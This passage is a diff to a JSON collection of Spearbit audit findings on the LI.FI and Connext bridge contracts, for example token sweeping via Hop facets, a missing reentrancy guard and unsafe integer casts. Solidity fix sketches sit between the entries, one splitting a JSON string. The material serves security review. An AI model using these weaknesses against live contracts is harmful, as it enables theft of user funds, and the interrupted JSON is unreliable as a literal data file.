This word is not so accurate/suggestive and also can be offensive.", + "title": "Sweep tokens from Hop facets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The Hop bridges HopFacet and HopFacetOptimized don't check that _bridgeData.sendingAssetId is the same as the bridge token. So this could be used to sweep tokens out of the Diamond contract. Normally there shouldn't be any tokens left at the Diamond, however, in this version there are small amounts left: Etherscan LiFiDiamond.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Incorrect comment on _mirrorConnector", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The comment on _mirrorConnector is incorrect as this does not denote address of the spoke connector", + "title": "Missing emit in _swapAndCompleteBridgeTokens of Receiver", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In function _swapAndCompleteBridgeTokens the catch of ERC20 tokens does an emit, while the comparable catch of native assets doesn't do an emit. function _swapAndCompleteBridgeTokens(...) ... { ... if (LibAsset.isNativeAsset(assetId)) { ... try ... {} catch { receiver.call{ value: amount }(\"\"); // no emit } ... } else { // case 2: ERC20 asset ... try ... {} catch { token.safeTransfer(receiver, amount); emit LiFiTransferRecovered(...); } } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "addStableSwapPool can have a more suggestive name and also better documentation for the _- stableSwapPool input parameter is recommended", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "1. The name suggests we are adding a new pool, although we are replacing/updating the current one. 2. _stableSwapPool needs to implement IStableSwap and it is supposed to be an external stable swap pool. It would be best to indicate that and possibly change the parameter input type to IStableSwap _stableSwap- Pool. 3. _stableSwapPool provided by the owner or an admin can have more than just 2 tokens as the @notice comment suggests. For example, the pool could have oUSDC, nextUSDC, oDAI, nextDAI, ... . Also there are no guarantees that the pooled tokens are pegged to each other. There is also a potential of having these pools have malicious or worthless tokens. What external pools does Connext team uses or is planning to use? This comment also applies to setupAsset and setupAssetWithDeployedRepresentation.", + "title": "Spam events in ServiceFeeCollector", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The contract ServiceFeeCollector has several functions that collect fees and are permissionless. This could result in spam events, which might confuse the processing of the events. function collectTokenGasFees(...) ... { ... emit GasFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeGasFees(...) ... { ... emit GasFeesCollected(LibAsset.NULL_ADDRESS, receiver, feeAmount); } function collectTokenInsuranceFees(...) ... { ...
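For the missing-emit finding above, a minimal sketch of the native-asset catch branch emitting the same recovery event as the ERC20 branch. The LiFiTransferRecovered signature is assumed for illustration, not taken from the audited interface.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch: emit the recovery event in the native-asset path too.
contract ReceiverEmitSketch {
    event LiFiTransferRecovered(
        bytes32 indexed transactionId,
        address receivingAssetId,
        address receiver,
        uint256 amount,
        uint256 timestamp
    );

    function _recoverNative(
        bytes32 _transactionId, address assetId, address payable receiver, uint256 amount
    ) internal {
        receiver.call{ value: amount }("");
        emit LiFiTransferRecovered(_transactionId, assetId, receiver, amount, block.timestamp);
    }
}
```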
emit InsuranceFeesCollected(tokenAddress, receiver, feeAmount); } function collectNativeInsuranceFees(...) ... { ... emit InsuranceFeesCollected(LibAsset.NULL_ADDRESS,receiver,feeAmount); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "_local has a misleading name in _addLiquidityForRouter and _removeLiquidityForRouter", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The name for _local parameter is misleading, since it has been used in _addLiquidityForRouter (TokenId memory canonical, bytes32 key) = _getApprovedCanonicalId(_local); and in _removeLiquidityForRouter TokenId memory canonical = _getCanonicalTokenId(_local); and we have the following call flow path: AssetLogic.getCanonicalTokenId uses the adoptedToCanonical mapping first then check if the input parameter is a canonical token for the current domain, then uses representationToCanonical mapping. So here _local could be an adopted token.", + "title": "Function depositAsset() allows 0 amount of native assets", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function depositAsset() disallows amount == 0 for ERC20 tokens; however, it allows amount == 0 for native assets. function depositAsset(address assetId, uint256 amount) internal { if (isNativeAsset(assetId)) { if (msg.value < amount) revert InvalidAmount(); } else { if (amount == 0) revert InvalidAmount(); ... } }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Document _calculateSwap's and _calculateSwapInv's calculations", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In _calculateSwap, the -1 in dy = xp[tokenIndexTo] - y - 1 is actually important. This is be- cause given no change in the asset balance of all tokens that already satisfy the stable swap invariant (dx = 0), getY (due to rounding errors) might return: y = xp[tokenIndexTo] which would in turn make dy = -1 that would revert the call. This case would need to be investigated. y = xp[tokenIndexTo] - 1 which would in turn make dy = 0 and so the call would return (0, 0). y = xp[tokenIndexTo] + 1 which would in turn make dy = -2 that would revert the call. This case would need to be investigated. 117 And similiarly in _calculateSwapInv, doing the same analysis for + 1 in dx = x - xp[tokenIndexFrom] + 1, if getYD returns: xp[tokenIndexFrom] +1, then dx = 2; xp[tokenIndexFrom], then dx = 1; xp[tokenIndexFrom] - 1, then dx = 0; Note, that the behavior is different and the call would never revert.", + "title": "Inadequate expiration time check in ThorSwapFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "According to Thorchain, the expiration time for certain operations should be set to +60 minutes. However, there is currently no check in place to enforce this requirement.
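For the depositAsset() finding above, a minimal sketch of applying the zero-amount check symmetrically to both asset kinds. The surrounding contract and helper are illustrative.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch: reject amount == 0 for native assets as well.
contract DepositAssetSketch {
    error InvalidAmount();

    address internal constant NATIVE_ASSETID = address(0);

    function isNativeAsset(address assetId) internal pure returns (bool) {
        return assetId == NATIVE_ASSETID;
    }

    function depositAsset(address assetId, uint256 amount) internal {
        if (amount == 0) revert InvalidAmount(); // now applies to both kinds
        if (isNativeAsset(assetId)) {
            if (msg.value < amount) revert InvalidAmount();
        } else {
            // ... ERC20 transferFrom path ...
        }
    }
}
```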
This oversight may lead to users inadvertently setting incorrect expiration times, potentially causing unexpected behavior or issues within the ThorSwapFacet.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Providing the from amount the same as the pool's from token balance, one might get a different return value compared to the current pool's to balance", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Note, due to some imbalance in the asset pool, given x = xp[tokenIndexFrom] (aka, no change in asset balance of tokenIndexFrom token in the asset pool), we might see a decrease or increase in the asset balance of tokenIndexTo to bring back the pool to satisfying the stable swap invariant. One source that can introduce an imbalance is when the scaled amplification coefficient is ramping.", + "title": "Insufficient validation of bridgedTokenSymbol and sendingAssetId", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "During the code review, it was noticed that the facet does not adequately check the correspondence between the bridgedTokenSymbol and sendingAssetId parameters. This oversight could allow for a random token to be sent to the Diamond, while still bridging another available token within the Diamond, even when no tokens should typically be left in the Diamond.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Document what type 0 means for TypedMemView", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "In the following line, 0 is passed as the new type for a TypedMemView bytes29 _message.slice(PREFIX_LENGTH, _message.len() - PREFIX_LENGTH, 0) But there is no documentation as to what type 0 signifies.", + "title": "Check for destinationChainId in CBridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Function _startBridge() of CBridgeFacet contains a check on destinationChainId and contains conversions to uint64. If both block.chainid and _bridgeData.destinationChainId fit in an uint64 then the checks of modifier validateBridgeData are already sufficient. When _bridgeData.destinationChainId > type(uint64).max then this never reverts: if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); Then in the rest of the code it takes the truncated version of the destinationChainId via uint64(_bridgeData.destinationChainId), which can be any value, including block.chainid. So you can still bridge to the same chain. function _startBridge(ILiFi.BridgeData memory _bridgeData,CBridgeData memory _cBridgeData) private { if (uint64(block.chainid) == _bridgeData.destinationChainId) revert CannotBridgeToSameNetwork(); if (...) { cBridge.sendNative{ value: _bridgeData.minAmount }(... , uint64(_bridgeData.destinationChainId),...); } else { ... cBridge.send(..., uint64(_bridgeData.destinationChainId), ...); } } modifier validateBridgeData(ILiFi.BridgeData memory _bridgeData) { ... if (_bridgeData.destinationChainId == block.chainid) { revert CannotBridgeToSameNetwork(); } ...
}", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Mixed use of require statements and custom errors", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The codebase includes a mix of require statements and custom errors.", + "title": "Absence of nonReentrant in HopFacetOptimized facet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "HopFacetOptimized is a facet-based smart contract implementation that aims to optimize gas usage and streamline the execution of certain functions. It doesn't have the checks that other facets have: nonReentrant refundExcessNative(payable(msg.sender)) containsSourceSwaps(_bridgeData) doesNotContainDestinationCalls(_bridgeData) validateBridgeData(_bridgeData) Most missing checks are done on purpose to save gas. However, the most important check is the nonReentrant modifier. On several places in the Diamond it is possible to trigger a reentrant call, for example via ERC777 tokens, custom tokens, native tokens transfers. In combination with the complexity of the code and the power of ERC20Proxy.sol it is difficult to make sure no attacks can occur.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "WatcherManager can make watchers public instead of having a getter function", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "WatcherManager has a private mapping watchers and a getter function isWatcher() to query that mapping. Since WatcherManager is not inherited by any other contract, it is safe to make it public to avoid the need of an explicit getter function.", + "title": "Revert for excessive approvals", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Certain tokens, such as UNI and COMP, revert if the value passed to approve or transfer exceeds uint96. Both aforementioned tokens possess unique logic in their approval process that sets the allowance to the maximum value of uint96 when the approval amount equals uint256(-1). Note: Hop currently doesn't support these tokens, so set to low risk.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Incorrect comment about relation between zero amount and asset", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "At BridgeFacet.sol#L514, if _amount == 0, _asset is allowed to have any user-specified value. _- xcall() reverts when zero address is specified for _asset on a non-zero _amount: if (_asset == address(0) && _amount != 0) { revert BridgeFacet__xcall_nativeAssetNotSupported(); } However, according to this comment if amount is 0, _asset also has to be the zero address which is not true (since it uses IFF): _params.normalizedIn = _asset == address(0) ?
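For the CBridgeFacet finding above, a minimal sketch of bounding destinationChainId before truncating to uint64. InvalidDestinationChain is an illustrative error name.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

// Illustrative sketch: reject chain ids that do not fit in uint64 instead of
// letting uint64(...) silently truncate them.
contract CBridgeChainIdSketch {
    error InvalidDestinationChain();
    error CannotBridgeToSameNetwork();

    function _checkedDestination(uint256 destinationChainId) internal view returns (uint64) {
        if (destinationChainId > type(uint64).max) revert InvalidDestinationChain();
        if (destinationChainId == block.chainid) revert CannotBridgeToSameNetwork();
        return uint64(destinationChainId); // safe: bounds checked above
    }
}
```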
0 // we know from assertions above this is the case IFF amount == 0 : AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount);", + "title": "Inconsistent transaction failure/stuck due to missing validation of global fixed native fee rate and execution fee", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The current implementation of the facet logic does not validate the global fixed native fee rate and execution fee, which can lead to inconsistent transaction failures or getting stuck in the process. This issue can arise when the fee rate is not set correctly or there are discrepancies between the fee rate used in the smart contract and the actual fee rate. This can result in transactions getting rejected or stuck, causing inconvenience to users and affecting the overall user experience.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "New Connector needs to be deployed if AMB changes", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The AMB address is configured to be immutable. If any of the chain's AMB changes, the Connector needs to be deployed. /** * @notice Address of the AMB on this domain. */ address public immutable AMB;", + "title": "Incorrect value emitted", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "LibSwap.swap() emits the following emit AssetSwapped( transactionId, _swap.callTo, _swap.sendingAssetId, _swap.receivingAssetId, _swap.fromAmount, newBalance > initialReceivingAssetBalance // toAmount ? newBalance - initialReceivingAssetBalance : newBalance, block.timestamp ); It will be difficult to interpret the value emitted for toAmount as the observer won't know which of the two values has been emitted.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Functions should be renamed", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The following functions should be renamed to be aligned with the naming convention of the fxPortal contracts. OptimismHubConnector.processMessageFromRoot to OptimismHubConnector.processMessageFromChild ArbitrumHubConnector.processMessageFromRoot to ArbitrumHubConnector.processMessageFromChild ZkSyncHubConnector.processMessageFromRoot to ZkSyncHubConnector.processMessageFromChild", + "title": "Storage slots derived from hashes are prone to pre-image attacks", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "Storage slots manually constructed using keccak hash of a string are prone to storage slot collision as the pre-images of these hashes are known. Attackers may find a potential path to those storage slots using the keccak hash function in the codebase and some crafted payload.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Twice function aggregate()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both the contracts Multicall and RootManager have a function called aggregate(). This could be confusing. 
Contract Multicall doesn't seem to be used. Multicall.sol function aggregate(Call[] memory calls) public view returns (uint256 blockNumber, bytes[] memory returnData) { ... ,! } RootManager.sol 120 function aggregate(uint32 _domain, bytes32 _inbound) external whenNotPaused onlyConnector(_domain) { ... }", + "title": "Incorrect arguments compared in SquidFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "startBridgeTokensViaSquid() reverts if (_squidData.sourceCalls.length > 0) != _bridgeData.hasSourceSwaps. Here, _squidData.sourceCalls is an argument passed to Squid Router, and _bridgeData.hasSourceSwaps refers to source swaps done by SquidFacet. Ideally, _bridgeData.hasSourceSwaps should be false for this function (though it's not enforced) which means _squidData.sourceCalls.length has to be 0 for it to successfully execute.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Careful when using _removeAssetId()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function _removeAssetId() removes an assets. Although it is called via authorized functions, mistakes could be made. It there are any representation assets left, they are worthless as they can't be bridged back anymore (unless reinstated via setupAssetWithDeployedRepresentation()). The representation assets might also be present and allowed in the StableSwap. If so, the owners of the worthless tokens could quickly swap them for real tokens. The canonical tokens will also be locked. function _removeAssetId(...) ... { ... }", + "title": "Unsafe casting of bridge amount from uint256 to uint128", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The issue with the code is that it performs an unsafe cast from a uint256 value to a uint128 value in the call to initiateTeleport() function. The _bridgeData.minAmount parameter passed to this function is of type uint256, but it is cast to uint128 without any checks, which may silently truncate the value. function _startBridge(ILiFi.BridgeData memory _bridgeData) internal { LibAsset.maxApproveERC20( IERC20(dai), address(teleportGateway), _bridgeData.minAmount ); teleportGateway.initiateTeleport( l1Domain, _bridgeData.receiver, uint128(_bridgeData.minAmount) ); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Low Risk" ] }, { - "title": "Unused import IAavePool in InboxFacet", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Contract InboxFacet imports IAavePool, however it doesn't use it. import {IAavePool} from \"../interfaces/IAavePool.sol\";", + "title": "Cache s.anyTokenAddresses[_bridgeData.sendingAssetId]", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function _startBridge() of MultichainFacet contains the following expression. This retrieves the value for s.anyTokenAddresses[_bridgeData.sendingAssetId] twice. It might save some gas to first store this in a tmp variable. s.anyTokenAddresses[_bridgeData.sendingAssetId] != address(0) ?
s.anyTokenAddresses[_bridgeData.sendingAssetId]: ...", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Use IERC20Metadata", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "interface. pelin/contracts/token/ERC20/extensions/IERC20Metadata.sol, which seems more logical. BridgeFacet.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function _xcall(...) ... { ... ... AssetLogic.normalizeDecimals(ERC20(_asset).decimals(), uint8(18), _amount); ... } AssetLogic.sol import {ERC20} from \"@openzeppelin/contracts/token/ERC20/ERC20.sol\"; ... function swapToLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(ERC20(_asset).decimals(), ERC20(_local).decimals(), _amount, _slippage) ... ... ,! } function swapFromLocalAssetIfNeeded(...) ... { ... ... calculateSlippageBoundary(uint8(18), ERC20(adopted).decimals(), _normalizedIn, _slippage) ... ... }", + "title": "DeBridgeFacet permit seems unusable", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function deBridgeGate.send() takes a parameter permit. This can only be used if it's signed by the Diamond, see DeBridgeGate.sol#L654-L662. As there is no code to let the Diamond sign a permit, this function doesn't seem usable. function _startBridge(...) ... { ... deBridgeGate.send{ value: nativeAssetAmount }(..., _deBridgeData.permit, ...); ... }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Generic name of proposedTimestamp()", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The function proposedTimestamp() has a very generic name. As there are other Timestamp func- tions this might be confusing. function proposedTimestamp() public view returns (uint256) { return s._proposedOwnershipTimestamp; } function routerWhitelistTimestamp() public view returns (uint256) { return s._routerWhitelistTimestamp; } function assetWhitelistTimestamp() public view returns (uint256) { return s._assetWhitelistTimestamp; }", + "title": "Redundant checks in CircleBridgeFacet", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The function swapAndStartBridgeTokensViaCircleBridge() contains both noNativeAsset() and onlyAllowSourceToken(). The check noNativeAsset() is not necessary as onlyAllowSourceToken() already verifies the sendingAssetId isn't a native token. function swapAndStartBridgeTokensViaCircleBridge(...) ... noNativeAsset(_bridgeData) onlyAllowSourceToken(_bridgeData, usdc) { ...
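For the unsafe-cast finding above, a minimal sketch using OpenZeppelin's SafeCast (4.x assumed), which reverts instead of silently truncating.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.17;

import { SafeCast } from "@openzeppelin/contracts/utils/math/SafeCast.sol";

// Illustrative sketch: SafeCast.toUint128 reverts on values above
// type(uint128).max instead of truncating them.
contract TeleportAmountSketch {
    using SafeCast for uint256;

    function _checkedAmount(uint256 minAmount) internal pure returns (uint128) {
        return minAmount.toUint128();
    }
}
```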
} modifier noNativeAsset(ILiFi.BridgeData memory _bridgeData) { if (LibAsset.isNativeAsset(_bridgeData.sendingAssetId)) { revert NativeAssetNotSupported(); } _; } modifier onlyAllowSourceToken(ILiFi.BridgeData memory _bridgeData, address _token) { if (_bridgeData.sendingAssetId != _token) { revert InvalidSendingToken(); } _; }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Two different nonces", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "Both LibConnextStorage and SpokeConnector define a nonce. As the names are very similar this could be confusing. LibConnextStorage.sol struct AppStorage { ... * @notice Nonce for the contract, used to keep unique transfer ids. * @dev Assigned at first interaction (xcall on origin domain). uint256 nonce; ... } SpokeConnector.sol * @notice domain => next available nonce for the domain. mapping(uint32 => uint32) public nonces;", + "title": "Redundant check on _swapData", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "This check is not present in the majority of the facets if (_swapData.length == 0) { revert NoSwapDataProvided(); } Ultimately, it's not required as _depositAndSwap() reverts when length is 0.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Tips to optimize rootWithCtx", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "To help with the optimization mentioned in the comment of rootWithCtx(), here is a way to count the trailing 0s: graphics.stanford.edu/~seander/bithacks.html#ZerosOnRightModLookup. function rootWithCtx(Tree storage tree, bytes32[TREE_DEPTH] memory _zeroes) internal view returns (bytes32 _current) { ... // TODO: Optimization: skip the first N loops where the ith bits are all 0 - start at that // depth with zero hashes. ... ,! }", + "title": "Duplicate checks done", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "In highlighted cases, a check has been done multiple times at different places: validateBridgeData modifier on ArbitrumBridgeFacet. _startBridge() does checks already done by functions from which it's called. depositAsset() does some checks already done by AmarokFacet.startBridgeTokensViaAmarok().", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Use delete", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "The functions _setOwner() and removeRouter() clear values by setting them to 0. Other parts of the code use delete. So using delete here too would be more consistent. ProposedOwnable.sol function _setOwner(address newOwner) internal { ... _proposedOwnershipTimestamp = 0; _proposed = address(0); ... } RoutersFacet.sol function removeRouter(address router) external onlyOwnerOrRouter { ... s.routerPermissionInfo.routerOwners[router] = address(0); ... s.routerPermissionInfo.routerRecipients[router] = address(0); ... 
}", + "title": "calldata can be used instead of memory", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "When the incoming argument is constant, calldata can be used instead of memory to save gas on copying it to memory. This remains true for individual array elements.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "replace usages of abi.encodeWithSignature and abi.encodeWithSelector with abi.encodeCall to ensure typo and type safety", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": " When abi.encodeWithSignature is used the compiler does not check for mistakes in the signature or the types provided. When abi.encodeWithSelector is used the compiler does not check for parameter type inconsistencies.", + "title": "Further gas optimizations for HopFacetOptimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "For the contract HopFacetOptimized it is very important to be gas optimized. Especially on Arbitrum, it is relatively expensive due to the calldata. struct HopData { uint256 bonderFee; uint256 amountOutMin; uint256 deadline; uint256 destinationAmountOutMin; uint256 destinationDeadline; IHopBridge hopBridge; } struct BridgeData { bytes32 transactionId; string bridge; string integrator; address referrer; address sendingAssetId; address receiver; uint256 minAmount; uint256 destinationChainId; bool hasSourceSwaps; bool hasDestinationCall; } function startBridgeTokensViaHopL1ERC20( ILiFi.BridgeData calldata _bridgeData, HopData calldata _hopData ) external { // Deposit assets LibAsset.transferFromERC20(...); _hopData.hopBridge.sendToL2(...); emit LiFiTransferStarted(_bridgeData); } function transferFromERC20(...) ... { if (assetId == NATIVE_ASSETID) revert NullAddrIsNotAnERC20Token(); if (to == NULL_ADDRESS) revert NoTransferToNullAddress(); IERC20 asset = IERC20(assetId); uint256 prevBalance = asset.balanceOf(to); SafeERC20.safeTransferFrom(asset, from, to, amount); if (asset.balanceOf(to) - prevBalance != amount) revert InvalidAmount(); }", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "setAggregators is missing checks against address(0)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setAggregators does not check if tokenAddresses[i] or sources[i] is address(0).", + "title": "payable keyword can be removed for some bridge functions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "For the above highlighted functions, the native token is never forwarded to the underlying bridge.
In these cases, the payable keyword and related modifier refundExcessNative(payable(msg.sender)) can be removed to save gas.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "setAggregators can be simplified", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "setAggregators does not check if tokenAddresses length is equal to sources to revert early.", + "title": "AmarokData.callTo can be removed", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "AmarokFacet's final receiver can be different from _bridgeData.receiver: address receiver = _bridgeData.hasDestinationCall ? _amarokData.callTo : _bridgeData.receiver; Since both _amarokData.callTo and _bridgeData.receiver are passed by the caller, AmarokData.callTo can be removed, and _bridgeData.receiver can be assumed as the final receiver.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Event is not emitted when an important action happens on-chain", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "No event is emitted when an important action happens on-chain.", + "title": "Use requiredEther variable instead of adding twice", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The cost and nativeAmount are added twice to calculate the requiredEther variable, which can lead to increased gas consumption.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Add unit/fuzz tests to make sure edge cases would not cause an issue in Queue._length", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "It is always assumed last + 1 >= first. It would be great to add unit/fuzz tests to check for this invariant. Adding these tests", + "title": "refundExcessNative modifier can be gas-optimized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LIFI-retainer1-Spearbit-Security-Review.pdf", + "body": "The highlighted code above can be gas-optimized by removing 1 if condition.", "labels": [ "Spearbit", - "ConnextNxtp", - "Severity: Informational" + "LIFI-retainer1", + "Severity: Gas Optimization" ] }, { - "title": "Consider using prefix(...) instead of slice(0,...)", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/ConnextNxtp-Spearbit-Security-Review.pdf", - "body": "tokenId() calls TypedMemView.slice() function to slice the first few bytes from _message: return _message.slice(0, TOKEN_ID_LEN, uint40(Types.TokenId)); TypedMemView.prefix() can also be used here since it achieves the same goal.", + "title": "BridgeData.hasSourceSwaps can be removed", + "html_url": 